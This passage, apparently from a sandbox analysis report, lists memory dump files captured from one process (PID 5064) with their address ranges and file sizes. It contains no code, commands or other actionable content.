                                                                                                                    • memory/5064-33-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-0-0x00000000744AE000-0x00000000744AF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5064-29-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-27-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-23-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-21-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-15-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-13-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-11-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-65-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-4892-0x00000000744A0000-0x0000000074C50000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5064-4894-0x0000000005AA0000-0x0000000005AEC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      304KB

                                                                                                                    • memory/5064-4893-0x0000000005460000-0x00000000054EC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      560KB

                                                                                                                    • memory/5064-67-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-69-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-4902-0x00000000744AE000-0x00000000744AF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5064-4904-0x00000000744A0000-0x0000000074C50000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5064-51-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-41-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-35-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-25-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-19-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-17-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-10-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-6-0x0000000006DF0000-0x000000000703A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-5-0x0000000005870000-0x0000000005902000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      584KB

                                                                                                                    • memory/5064-5411-0x0000000005AF0000-0x0000000005B44000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      336KB

                                                                                                                    • memory/5064-5498-0x00000000744A0000-0x0000000074C50000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5064-4-0x00000000075F0000-0x0000000007B94000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.6MB

                                                                                                                    • memory/5064-3-0x0000000006DF0000-0x0000000007040000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.3MB

                                                                                                                    • memory/5064-2-0x00000000744A0000-0x0000000074C50000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/5064-1-0x0000000000080000-0x00000000000BC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      240KB